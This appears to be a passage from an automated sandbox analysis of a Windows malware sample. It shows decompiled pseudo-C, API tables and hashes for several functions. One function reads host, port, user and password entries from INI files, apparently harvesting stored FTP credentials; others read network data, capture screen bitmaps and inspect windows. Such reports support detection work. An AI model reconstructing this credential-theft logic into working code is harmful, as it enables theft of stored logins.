				int _t102;
				WCHAR* _t107;
				intOrPtr _t114;
				signed int _t115;
				void* _t117;

				_t117 = (_t115 & 0xfffffff8) - 0x26c;
				if(E0041BC2F( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L19:
					return 1;
				}
				_t120 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_t107 = E00416378(0x1fffe);
					_v612 = _t107;
					__eflags = _t107;
					if(_t107 == 0) {
						goto L19;
					}
					_t51 = GetPrivateProfileStringW(0, 0, 0, _t107, 0xffff,  &_v524);
					__eflags = _t51;
					if(_t51 == 0) {
						L18:
						E004163A8(_t107);
						goto L19;
					}
					_t9 =  &(_t51[0]); // 0x1
					_t54 = E00417258(_t107, _t9);
					__eflags = _t54;
					if(_t54 == 0) {
						goto L18;
					}
					_t56 = E00416378(0xc1c);
					_v620 = _t56;
					__eflags = _t56;
					if(_t56 != 0) {
						_t11 =  &(_t56[0xff]); // 0x1fe
						_t92 = _t11;
						_v624 = _t107;
						_v616 = _t92;
						_t57 = 0x5c;
						_t93 =  &(_t92[0xff]);
						__eflags = _t93;
						E0040FA33(_t57,  &_v608);
						_t59 = 0x5d;
						E0040FA33(_t59,  &_v588);
						_t61 = 0x5e;
						E0040FA33(_t61,  &_v576);
						_t63 = 0x5f;
						E0040FA33(_t63,  &_v600);
						do {
							_t67 = GetPrivateProfileStringW(_v624,  &_v608, 0, _v620, 0xff,  &_v524);
							__eflags = _t67;
							if(_t67 != 0) {
								_t102 = GetPrivateProfileIntW(_v624,  &_v588, 0x15,  &_v524);
								_t25 = _t102 - 1; // -1
								__eflags = _t25 - 0xfffe;
								if(_t25 <= 0xfffe) {
									_t77 = GetPrivateProfileStringW(_v624,  &_v576, 0, _v616, 0xff,  &_v524);
									__eflags = _t77;
									if(_t77 != 0) {
										_t80 = GetPrivateProfileStringW(_v624,  &_v600, 0, _t93, 0xff,  &_v524);
										__eflags = _t80;
										if(_t80 != 0) {
											_t82 = E0040AA83(_v624, _t93);
											__eflags = _t82;
											if(_t82 > 0) {
												_t113 =  &_v564;
												_t83 = 0x55;
												E0040FA33(_t83,  &_v564);
												_push(_t102);
												_push(_v620);
												_push(_t93);
												_push(_v616);
												_t37 =  &(_t93[0xff]); // 0x1fe
												_t103 = _t37;
												_t86 = E0041709B(_t113, 0x311, _t37, _t113);
												_t117 = _t117 + 0x14;
												__eflags = _t86;
												if(_t86 > 0) {
													_t114 = _a4;
													_t87 = E0041679C(_t86, _t114, _t103);
													__eflags = _t87;
													if(_t87 != 0) {
														_t39 = _t114 + 4;
														 *_t39 =  &(( *(_t114 + 4))[0]);
														__eflags =  *_t39;
													}
												}
											}
										}
									}
								}
							}
							_t69 = E00417294(_v624, 1);
							_v628 = _t69;
							__eflags = _t69;
						} while (_t69 != 0);
						E004163A8(_v620);
						_t107 = _v616;
					}
					goto L18;
				} else {
					E0040AB36(_t120,  &_v524, _a4);
					goto L19;
				}
			}

0x0040ab96
0x0040abb1
0x0040ad73
0x0040ad7b
0x0040ad7b
0x0040abb7
0x0040abba
0x0040abd8
0x0040abda
0x0040abde
0x0040abe0
0x00000000
0x00000000
0x0040abf7
0x0040abfd
0x0040abff
0x0040ad6d
0x0040ad6e
0x00000000
0x0040ad6e
0x0040ac05
0x0040ac0a
0x0040ac0f
0x0040ac11
0x00000000
0x00000000
0x0040ac1c
0x0040ac21
0x0040ac25
0x0040ac27
0x0040ac2d
0x0040ac2d
0x0040ac35
0x0040ac39
0x0040ac41
0x0040ac42
0x0040ac42
0x0040ac48
0x0040ac53
0x0040ac54
0x0040ac5f
0x0040ac60
0x0040ac6b
0x0040ac6c
0x0040ac71
0x0040ac8b
0x0040ac91
0x0040ac93
0x0040acaf
0x0040acb1
0x0040acb4
0x0040acb9
0x0040acd4
0x0040acda
0x0040acdc
0x0040acf0
0x0040acf6
0x0040acf8
0x0040acfe
0x0040ad03
0x0040ad05
0x0040ad09
0x0040ad0d
0x0040ad0e
0x0040ad13
0x0040ad14
0x0040ad1a
0x0040ad1b
0x0040ad25
0x0040ad25
0x0040ad2b
0x0040ad30
0x0040ad33
0x0040ad35
0x0040ad37
0x0040ad3d
0x0040ad42
0x0040ad44
0x0040ad46
0x0040ad46
0x0040ad46
0x0040ad46
0x0040ad44
0x0040ad35
0x0040ad05
0x0040acf8
0x0040acdc
0x0040acb9
0x0040ad4f
0x0040ad54
0x0040ad58
0x0040ad58
0x0040ad64
0x0040ad69
0x0040ad69
0x00000000
0x0040abbc
0x0040abc4
0x00000000
0x0040abc4

APIs

Part of subcall function 0041BC2F: PathCombineW.SHLWAPI(0040E807,0040E807,?,0040E807,?,?), ref: 0041BC4E

GetPrivateProfileStringW.KERNEL32 ref: 0040ABF7
GetPrivateProfileStringW.KERNEL32 ref: 0040AC8B
GetPrivateProfileIntW.KERNEL32 ref: 0040ACA9
GetPrivateProfileStringW.KERNEL32 ref: 0040ACD4
GetPrivateProfileStringW.KERNEL32 ref: 0040ACF0

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: PrivateProfile$String$CombinePath
String ID:
API String ID: 2134968610-0
Opcode ID: 560f140593ad789c46cda81d3a7d71b549fbe4d83642ffcfc9816df20366fd9a
Instruction ID: b847b3d7e2cbbeae6c259c69b12aaa1599ac4d9783021d40d9dae85e452aa0c9
Opcode Fuzzy Hash: 560f140593ad789c46cda81d3a7d71b549fbe4d83642ffcfc9816df20366fd9a
Instruction Fuzzy Hash: F751AF31508705ABDB20DF61CC01FAB7BE9EF84744F04093EB994E71A1D738D9458B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041C213, Relevance: 7.6, APIs: 5, Instructions: 111
fileCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0041C213(void* __ecx, signed int __edx, void** __esi, long _a4) {
				char _v5;
				void _v16;
				struct _OVERLAPPED* _v24;
				struct _OVERLAPPED* _v28;
				signed int _v32;
				signed int _v36;
				void* _t29;
				signed int _t31;
				int _t38;
				int _t39;
				signed int _t41;
				int _t42;
				int _t45;
				intOrPtr _t48;
				void* _t49;
				signed int _t53;
				struct _OVERLAPPED* _t54;
				void** _t56;

				_t56 = __esi;
				_t53 = __edx;
				_t49 = __ecx;
				_t54 = 0;
				_v5 = 0;
				_t29 = CreateFileW(_a4, 0xc0000000, 1, 0, 4, 0x80, 0);
				 *__esi = _t29;
				if(_t29 != 0xffffffff) {
					_t31 = E0041B6DE(_t49, _t29);
					_v36 = _t31;
					_v32 = _t53;
					if((_t31 & _t53) == 0xffffffff) {
						L4:
						CloseHandle( *_t56);
						 *_t56 =  *_t56 | 0xffffffff;
					} else {
						if((_t31 | _t53) == 0) {
							L18:
							_t56[2] = _t56[2] | 0xffffffff;
							_t25 =  &(_t56[3]);
							 *_t25 = _t56[3] | 0xffffffff;
							__eflags =  *_t25;
							_v5 = 1;
							E0041B68E( *_t56, _t54, _t54, _t54);
						} else {
							_v28 = 0;
							_v24 = 0;
							if(ReadFile( *__esi,  &_v16, 5,  &_a4, 0) != 0) {
								while(1) {
									__eflags = _a4 - _t54;
									if(_a4 == _t54) {
										goto L18;
									}
									__eflags = _a4 - 5;
									if(_a4 != 5) {
										L16:
										_t38 = E0041B68E( *_t56, _v28, _v24, _t54);
										__eflags = _t38;
										if(_t38 == 0) {
											goto L4;
										} else {
											_t39 = SetEndOfFile( *_t56);
											__eflags = _t39;
											if(_t39 == 0) {
												goto L4;
											} else {
												goto L18;
											}
										}
									} else {
										_t41 = _v16 ^ _t56[4];
										asm("adc edi, [ebp-0x14]");
										_t48 = _t41 + _v28 + 5;
										asm("adc edi, ecx");
										_v16 = _t41;
										__eflags = 0 - _v32;
										if(__eflags > 0) {
											L15:
											_t54 = 0;
											__eflags = 0;
											goto L16;
										} else {
											if(__eflags < 0) {
												L11:
												__eflags = _t41 - 0xa00000;
												if(_t41 > 0xa00000) {
													goto L15;
												} else {
													_t42 = E0041B68E( *_t56, _t41, 0, 1);
													__eflags = _t42;
													if(_t42 == 0) {
														goto L4;
													} else {
														_v28 = _t48;
														_v24 = 0;
														_t45 = ReadFile( *_t56,  &_v16, 5,  &_a4, 0);
														__eflags = _t45;
														if(_t45 != 0) {
															_t54 = 0;
															__eflags = 0;
															continue;
														} else {
															goto L4;
														}
													}
												}
											} else {
												__eflags = _t48 - _v36;
												if(_t48 > _v36) {
													goto L15;
												} else {
													goto L11;
												}
											}
										}
									}
									goto L19;
								}
								goto L18;
							} else {
								goto L4;
							}
						}
					}
				}
				L19:
				return _v5;
			}

0x0041c213
0x0041c213
0x0041c213
0x0041c21b
0x0041c230
0x0041c234
0x0041c23a
0x0041c23f
0x0041c246
0x0041c24f
0x0041c252
0x0041c258
0x0041c27f
0x0041c281
0x0041c287
0x0041c25a
0x0041c25c
0x0041c324
0x0041c324
0x0041c328
0x0041c328
0x0041c328
0x0041c331
0x0041c335
0x0041c262
0x0041c26f
0x0041c272
0x0041c27d
0x0041c291
0x0041c291
0x0041c294
0x00000000
0x00000000
0x0041c29a
0x0041c29e
0x0041c2fe
0x0041c307
0x0041c30c
0x0041c30e
0x00000000
0x0041c314
0x0041c316
0x0041c31c
0x0041c31e
0x00000000
0x00000000
0x00000000
0x00000000
0x0041c31e
0x0041c2a0
0x0041c2a3
0x0041c2af
0x0041c2b2
0x0041c2b5
0x0041c2b7
0x0041c2ba
0x0041c2bd
0x0041c2fc
0x0041c2fc
0x0041c2fc
0x00000000
0x0041c2bf
0x0041c2bf
0x0041c2c6
0x0041c2c6
0x0041c2cb
0x00000000
0x0041c2cd
0x0041c2d3
0x0041c2d8
0x0041c2da
0x00000000
0x0041c2dc
0x0041c2ea
0x0041c2ed
0x0041c2f0
0x0041c2f6
0x0041c2f8
0x0041c28f
0x0041c28f
0x00000000
0x0041c2fa
0x00000000
0x0041c2fa
0x0041c2f8
0x0041c2da
0x0041c2c1
0x0041c2c1
0x0041c2c4
0x00000000
0x00000000
0x00000000
0x00000000
0x0041c2c4
0x0041c2bf
0x0041c2bd
0x00000000
0x0041c29e
0x00000000
0x00000000
0x00000000
0x00000000
0x0041c27d
0x0041c25c
0x0041c258
0x0041c33a
0x0041c340

APIs

CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000004,00000080,00000000,?,?,004051AC,?,?,?,00000102,?), ref: 0041C234

Part of subcall function 0041B6DE: GetFileSizeEx.KERNEL32(00000000,00000000,?,?,?,0041C24B,00000000,?,004051AC,?,?,?,00000102,?), ref: 0041B6EA

ReadFile.KERNEL32(?,?,00000005,?,00000000,00000000,?,004051AC,?,?,?,00000102,?), ref: 0041C275
CloseHandle.KERNEL32(?,00000000,?,004051AC,?,?,?,00000102,?), ref: 0041C281
ReadFile.KERNEL32(?,?,00000005,00000005,00000000,?,?,00000000,00000001,?,004051AC,?,?,?,00000102,?), ref: 0041C2F0
SetEndOfFile.KERNEL32(?,?,?,00000102,00000000,?,004051AC,?,?,?,00000102,?), ref: 0041C316

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: File$Read$CloseCreateHandleSize
String ID:
API String ID: 1850650832-0
Opcode ID: afd4966593925270f461fc24db0a5286daa9952374ba60f3c4a162d770466536
Instruction ID: a517ecea456b8af5f83c85a7c5dc705592275d217ac7e933d2a8e163fe0b2dab
Opcode Fuzzy Hash: afd4966593925270f461fc24db0a5286daa9952374ba60f3c4a162d770466536
Instruction Fuzzy Hash: 8D41A230980208AFDF208FA5CC85FEFBFB5EF99714F14415AE5A1A62A0D7394981CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041C948, Relevance: 7.6, APIs: 5, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0041C948(void* __ecx, signed int __edx, void* __eflags, struct HDC__* _a4, BITMAPINFO** _a8, void** _a12, void* _a16, long _a20, void* _a24) {
				int _v8;
				void* _t37;
				long _t38;
				struct HBITMAP__* _t46;
				void* _t47;
				signed int _t56;
				signed int _t57;
				BITMAPINFO** _t62;
				BITMAPINFO* _t64;

				_t57 = __edx;
				_v8 = 0;
				_t64 = E00416378(0x428);
				if(_t64 == 0) {
					L14:
					if(_a24 != 0) {
						DeleteObject(_a24);
					}
					L16:
					return _v8;
				}
				_t64->bmiHeader = 0x28;
				if(GetDIBits(_a4, _a24, 0, 1, 0, _t64, 0) == 0 || GetDIBits(_a4, _a24, 0, 1, 0, _t64, 0) == 0) {
					L13:
					E004163A8(_t64);
					goto L14;
				} else {
					DeleteObject(_a24);
					asm("cdq");
					_t56 =  ~((_t64->bmiHeader.biHeight ^ __edx) - __edx);
					_t37 = (_t64->bmiHeader.biBitCount & 0x0000ffff) - 1;
					_a24 = 0;
					_t64->bmiHeader.biHeight = _t56;
					if(_t37 == 0) {
						L7:
						_t64->bmiHeader.biClrUsed = 0;
						_push(8);
						_t64->bmiHeader.biClrImportant = 0;
						L8:
						_pop(_t38);
						_t64->bmiHeader.biBitCount = _t38;
						L9:
						_t62 = _a8;
						asm("cdq");
						_t58 = _t57 & 0x00000007;
						asm("cdq");
						_t64->bmiHeader.biSizeImage = ((_t64->bmiHeader.biBitCount & 0x0000ffff) * _t64->bmiHeader.biWidth * _t56 + (_t57 & 0x00000007) >> 0x00000003 ^ _t58) - _t58;
						_t64->bmiHeader.biCompression = 0;
						if(_t62 != 0) {
							 *_t62 = _t64;
						}
						_t46 = CreateDIBSection(_a4, _t64, 0, _a12, _a16, _a20);
						_v8 = _t46;
						if(_t46 == 0 || _t62 == 0) {
							goto L13;
						} else {
							goto L16;
						}
					}
					_t47 = _t37 - 3;
					if(_t47 == 0) {
						goto L7;
					}
					if(_t47 != 0x14) {
						goto L9;
					}
					_push(0x20);
					goto L8;
				}
			}

0x0041c948
0x0041c956
0x0041c95e
0x0041c962
0x0041ca2a
0x0041ca2d
0x0041ca32
0x0041ca32
0x0041ca38
0x0041ca3f
0x0041ca3f
0x0041c977
0x0041c984
0x0041ca24
0x0041ca25
0x00000000
0x0041c9a0
0x0041c9a3
0x0041c9ac
0x0041c9b7
0x0041c9b9
0x0041c9ba
0x0041c9bd
0x0041c9c0
0x0041c9d0
0x0041c9d0
0x0041c9d3
0x0041c9d5
0x0041c9d8
0x0041c9d8
0x0041c9d9
0x0041c9dd
0x0041c9e5
0x0041c9eb
0x0041c9ec
0x0041c9f4
0x0041c9f9
0x0041c9fc
0x0041ca01
0x0041ca03
0x0041ca03
0x0041ca13
0x0041ca19
0x0041ca1e
0x00000000
0x00000000
0x00000000
0x00000000
0x0041ca1e
0x0041c9c2
0x0041c9c5
0x00000000
0x00000000
0x0041c9ca
0x00000000
0x00000000
0x0041c9cc
0x00000000
0x0041c9cc

APIs

GetDIBits.GDI32(00000000,00407E1B,00000000,00000001,00000000,00000000,00000000), ref: 0041C980
GetDIBits.GDI32(00000000,00407E1B,00000000,00000001,00000000,00000000,00000000), ref: 0041C996
DeleteObject.GDI32(00407E1B), ref: 0041C9A3
CreateDIBSection.GDI32(00000000,00000000,00000000,00422900,?,?), ref: 0041CA13
DeleteObject.GDI32(00407E1B), ref: 0041CA32

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: BitsDeleteObject$CreateSection
String ID:
API String ID: 1423349713-0
Opcode ID: 270187c795af2eb141af6b48b31d41df1bae428e2fb768f13feb005e9946d8a3
Instruction ID: 8533e82b4ebfd9bdba1fc0e078e16a2cd93a8621aba6f0b143b003a50aebd256
Opcode Fuzzy Hash: 270187c795af2eb141af6b48b31d41df1bae428e2fb768f13feb005e9946d8a3
Instruction Fuzzy Hash: 9531B3B214020AAFDF208F25CD84AEB7BE9EF04384B04842FF945D6660C335DD919B64

Uniqueness

Uniqueness Score: -1.00%

Function 00407308, Relevance: 7.6, APIs: 5, Instructions: 94
networkCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00407308(intOrPtr* __edi, void* __eflags, intOrPtr _a4, void* _a8, intOrPtr* _a12) {
				intOrPtr _v28;
				signed int _v44;
				char _v52;
				intOrPtr _v56;
				char _v61;
				intOrPtr _v64;
				signed int _v72;
				intOrPtr _v76;
				char _v77;
				intOrPtr _v84;
				intOrPtr _v85;
				char _v89;
				void* __esi;
				char _t31;
				intOrPtr _t32;
				char* _t37;
				intOrPtr _t44;
				intOrPtr* _t58;
				intOrPtr _t62;
				intOrPtr* _t63;
				intOrPtr _t65;

				_t63 = __edi;
				ResetEvent(_a8);
				_t31 = E00416378(0x1000);
				_t65 = 0;
				_v52 = _t31;
				if(_t31 != 0) {
					_t58 = __imp__InternetSetStatusCallbackW;
					_t32 =  *_t58(_a4, E004072BF);
					_t62 = 0x28;
					_v56 = _t32;
					 *_a12 = 0;
					 *__edi = 0;
					_v61 = 1;
					E0041645B( &_v52,  &_v52, 0, _t62);
					_v64 = _t62;
					_v44 = _v72;
					while(1) {
						L3:
						_t37 =  &_v52;
						_v28 = 0x1000;
						__imp__InternetReadFileExA(_a4, _t37, 8, _t65);
						if(_t37 == 0) {
							break;
						}
						if(_v44 != _t65) {
							_t67 = _a12;
							if(E00416333( *_t63 + _v44, _a12) == 0) {
								L9:
								_v77 = 0;
							} else {
								E004163E4( *_t67 +  *_t63, _v76, _v44);
								 *_t63 =  *_t63 + _v56;
								_t65 = 0;
								continue;
							}
						}
						L10:
						asm("sbb eax, eax");
						 *_t58(_a4,  ~(_v72 + 1) & _v72);
						E004163A8(_v84);
						if(_v89 == 0) {
							E004163A8( *_a12);
						}
						_t44 = _v85;
						goto L13;
					}
					if(GetLastError() != 0x3e5) {
						goto L9;
					} else {
						E00419B15( &_a8);
						goto L3;
					}
					goto L10;
				} else {
					E004163A8(0);
					_t44 = 0;
				}
				L13:
				return _t44;
			}

0x00407308
0x00407316
0x00407321
0x00407326
0x00407328
0x0040732e
0x0040733d
0x0040734b
0x0040734f
0x00407350
0x00407358
0x00407360
0x00407362
0x00407367
0x00407370
0x00407374
0x00407378
0x00407378
0x0040737b
0x00407383
0x0040738b
0x00407393
0x00000000
0x00000000
0x004073b1
0x004073b9
0x004073c3
0x004073e3
0x004073e3
0x004073c5
0x004073d4
0x004073dd
0x004073df
0x00000000
0x004073df
0x004073c3
0x004073e8
0x004073ef
0x004073f9
0x004073ff
0x00407409
0x00407410
0x00407410
0x00407415
0x00000000
0x00407415
0x004073a0
0x00000000
0x004073a2
0x004073a6
0x00000000
0x004073a6
0x00000000
0x00407330
0x00407331
0x00407336
0x00407336
0x00407419
0x0040741e

APIs

ResetEvent.KERNEL32(?), ref: 00407316
InternetSetStatusCallbackW.WININET(?,004072BF), ref: 0040734B
InternetReadFileExA.WININET ref: 0040738B
GetLastError.KERNEL32 ref: 00407395
InternetSetStatusCallbackW.WININET(?,?), ref: 004073F9

Part of subcall function 004163A8: HeapFree.KERNEL32(00000000,00000000,00417B9F,00000000,?,?,?,0040E6CA,00000000,0040EBA4), ref: 004163BB

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Internet$CallbackStatus$ErrorEventFileFreeHeapLastReadReset
String ID:
API String ID: 4044253124-0
Opcode ID: 210ae000894b1240dfa163c6ed5f21befdfd9d63da9dfe5482d80be29bb1a3e1
Instruction ID: 3773aba7d90717f5c5b547a08fc44b5c282ca7e279ec88f131c99250a96b2082
Opcode Fuzzy Hash: 210ae000894b1240dfa163c6ed5f21befdfd9d63da9dfe5482d80be29bb1a3e1
Instruction Fuzzy Hash: F4316B31508345ABDB11DF64CC80A9EBBE4BF88344F00492AFC94E72A0C738D954DB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041D4C1, Relevance: 7.6, APIs: 5, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041D4C1(struct HWND__* __ecx, intOrPtr* __edx) {
				struct tagRECT _v24;
				char _v28;
				struct HWND__* _v32;
				intOrPtr _v36;
				struct HWND__* _v40;
				void* __edi;
				intOrPtr _t29;
				signed int _t30;
				RECT* _t52;
				signed int _t54;
				intOrPtr* _t61;

				_t55 = __edx;
				_t61 = __edx;
				 *( *(__edx + 0x14)) = 0x3c;
				_v32 = __ecx;
				if(GetWindowInfo(__ecx,  *(__edx + 0x14)) == 0) {
					L12:
					return 1;
				}
				_t29 =  *((intOrPtr*)(_t61 + 0x14));
				_t54 =  *(_t29 + 0x24);
				if((_t54 & 0x40000000) == 0) {
					_t52 =  *_t61 + 0x24;
				} else {
					_t52 = _t61 + 4;
				}
				if((_t54 & 0x10000000) == 0) {
					_t30 = 0;
					goto L9;
				} else {
					if((IntersectRect( &_v24, _t29 + 0x14, _t52) & 0xffffff00 | _t40 != 0x00000000) != 0) {
						L10:
						E0041D350( *_t61, _t54, _t55, _t52, _v32,  *((intOrPtr*)(_t61 + 0x14)));
						_v36 =  *_t61;
						_v24.right =  *((intOrPtr*)(_t61 + 0x14));
						if(GetTopWindow(_v40) != 0) {
							E0041AAAE( &_v28, _t35);
						}
						goto L12;
					}
					if(IsRectEmpty( *((intOrPtr*)(_t61 + 0x14)) + 0x14) == 0) {
						goto L12;
					}
					_t30 = IntersectRect( &_v24,  *((intOrPtr*)(_t61 + 0x14)) + 4, _t52) & 0xffffff00 | _t48 != 0x00000000;
					L9:
					if(_t30 == 0) {
						goto L12;
					}
					goto L10;
				}
			}

0x0041d4c1
0x0041d4cc
0x0041d4d2
0x0041d4db
0x0041d4e8
0x0041d58c
0x0041d594
0x0041d594
0x0041d4ee
0x0041d4f1
0x0041d4fa
0x0041d503
0x0041d4fc
0x0041d4fc
0x0041d4fc
0x0041d50c
0x0041d550
0x00000000
0x0041d50e
0x0041d527
0x0041d556
0x0041d561
0x0041d56c
0x0041d573
0x0041d57f
0x0041d587
0x0041d587
0x00000000
0x0041d57f
0x0041d538
0x00000000
0x00000000
0x0041d54b
0x0041d552
0x0041d554
0x00000000
0x00000000
0x00000000
0x0041d554

APIs

GetWindowInfo.USER32 ref: 0041D4E0
IntersectRect.USER32 ref: 0041D51E
IsRectEmpty.USER32(?), ref: 0041D530
IntersectRect.USER32 ref: 0041D547
GetTopWindow.USER32(?), ref: 0041D577

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Rect$IntersectWindow$EmptyInfo
String ID:
API String ID: 1664082778-0
Opcode ID: 5fda41726500f71b8c32132b41565d9efee3aee98eb1c6c9a7c40619fac55de3
Instruction ID: 21d1878855692dbba97cf7365b6c3679ba2e484f146018f50b2be6397dd8cf20
Opcode Fuzzy Hash: 5fda41726500f71b8c32132b41565d9efee3aee98eb1c6c9a7c40619fac55de3
Instruction Fuzzy Hash: 5021A1B1500301ABD720DF29DD80E97B7EDAF44718F040A2AF886D3211D738E849CB76

Uniqueness

Uniqueness Score: -1.00%

Function 0040FAF3, Relevance: 7.6, APIs: 5, Instructions: 72
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040FAF3(void* __ecx, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v104;
				char _v204;
				char _v724;
				void* __edi;
				void* __esi;
				intOrPtr _t18;
				void* _t24;
				void* _t26;
				long _t28;
				long _t35;
				void* _t40;
				WCHAR* _t43;
				void* _t50;

				_t50 = __eflags;
				_t40 = __ecx;
				SetThreadPriority(GetCurrentThread(), 0);
				_t18 = E0040EDBB(_t40, _t50, 0x19367402, 1);
				_v12 = _t18;
				if(_t18 != 0) {
					E0040ED80(0xff220829,  &_v204, 0);
					_t43 =  &_v724;
					E0040F0DC(_t40, _t43, 1);
					PathQuoteSpacesW(_t43);
					_t41 = _t43;
					_v8 = E00416EF7(_t43);
					_t24 = E0040EEE1();
					__eflags = _t24;
					if(_t24 == 0) {
						L7:
						E00419B7B(_v12);
						__eflags = 0;
						return 0;
					}
					_t26 = 3;
					E0040FA33(_t26,  &_v104);
					_t28 = WaitForSingleObject( *0x42305c, 0xc8);
					__eflags = _t28 - 0x102;
					if(_t28 != 0x102) {
						L6:
						goto L7;
					}
					_v8 = _v8 + _v8 + 2;
					do {
						E0041A627(_t41,  &_v104,  &_v204, 1,  &_v724, _v8);
						_t35 = WaitForSingleObject( *0x42305c, 0xc8);
						__eflags = _t35 - 0x102;
					} while (_t35 == 0x102);
					goto L6;
				}
				return _t18 + 1;
			}

0x0040faf3
0x0040faf3
0x0040fb05
0x0040fb12
0x0040fb17
0x0040fb1c
0x0040fb33
0x0040fb3a
0x0040fb40
0x0040fb48
0x0040fb4e
0x0040fb55
0x0040fb58
0x0040fb5d
0x0040fb5f
0x0040fbbe
0x0040fbc1
0x0040fbc6
0x00000000
0x0040fbc8
0x0040fb68
0x0040fb69
0x0040fb80
0x0040fb85
0x0040fb87
0x0040fbbc
0x00000000
0x0040fbbd
0x0040fb90
0x0040fb93
0x0040fbaa
0x0040fbb6
0x0040fbb8
0x0040fbb8
0x00000000
0x0040fb93
0x00000000

APIs

GetCurrentThread.KERNEL32 ref: 0040FAFE
SetThreadPriority.KERNEL32(00000000), ref: 0040FB05

Part of subcall function 0040EDBB: CreateMutexW.KERNEL32(00422BD0,00000000,?,?,?,?,?), ref: 0040EDDC

PathQuoteSpacesW.SHLWAPI(?,00000001,FF220829,?,00000000,?,19367402,00000001), ref: 0040FB48
WaitForSingleObject.KERNEL32(000000C8,?,?,?,19367402,00000001), ref: 0040FB80
WaitForSingleObject.KERNEL32(000000C8,?,?,00000001,?,?,?,?,?,19367402,00000001), ref: 0040FBB6

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: ObjectSingleThreadWait$CreateCurrentMutexPathPriorityQuoteSpaces
String ID:
API String ID: 123286213-0
Opcode ID: 0272005301a5c0d8f66b1e4250fc5aedca71d7aed007378b27edfa9f2faadc99
Instruction ID: ef3e1ff973dff25f5c551af6ddd75fed770c433d0860d0ad83825730942d2544
Opcode Fuzzy Hash: 0272005301a5c0d8f66b1e4250fc5aedca71d7aed007378b27edfa9f2faadc99
Instruction Fuzzy Hash: 29218171A00208AEEF21EBA1DD45FEE77BDEB44308F1004B6F505F71A1D678AE458B99

Uniqueness

Uniqueness Score: -1.00%

Function 004198CD, Relevance: 7.6, APIs: 5, Instructions: 63networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,00000002,00000000), ref: 004198DF
WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,?,00000000,?,00000000,00000000), ref: 00419909
WSAGetLastError.WS2_32(?,00000000), ref: 00419910
WSAIoctl.WS2_32(?,48000016,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0041993C

Part of subcall function 004163A8: HeapFree.KERNEL32(00000000,00000000,00417B9F,00000000,?,?,?,0040E6CA,00000000,0040EBA4), ref: 004163BB

closesocket.WS2_32(?), ref: 00419950

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Ioctl$ErrorFreeHeapLastclosesocketsocket
String ID:
API String ID: 2355469559-0
Opcode ID: d770af796127c7ce969bfb0037b0d61c0ec5abd71003652aea86083fdda22567
Instruction ID: a19caf95d61c025b6930cc913926e9014dbba8c84ea1fdc64392089835863b6f
Opcode Fuzzy Hash: d770af796127c7ce969bfb0037b0d61c0ec5abd71003652aea86083fdda22567
Instruction Fuzzy Hash: 491151B5401128BFDB11AB65DD49CDF7E3CEF463A4B104129F505E7260D6349E81DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041D0C7, Relevance: 7.6, APIs: 5, Instructions: 56
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041D0C7(struct HWND__* _a4, struct tagRECT* _a8, int _a12) {
				int _t20;
				signed int _t21;
				struct HWND__* _t28;
				char* _t32;

				_t28 = _a4;
				if(( *0x422b98 & 0x00000004) == 0 || E0040EEE1() == 0) {
					L9:
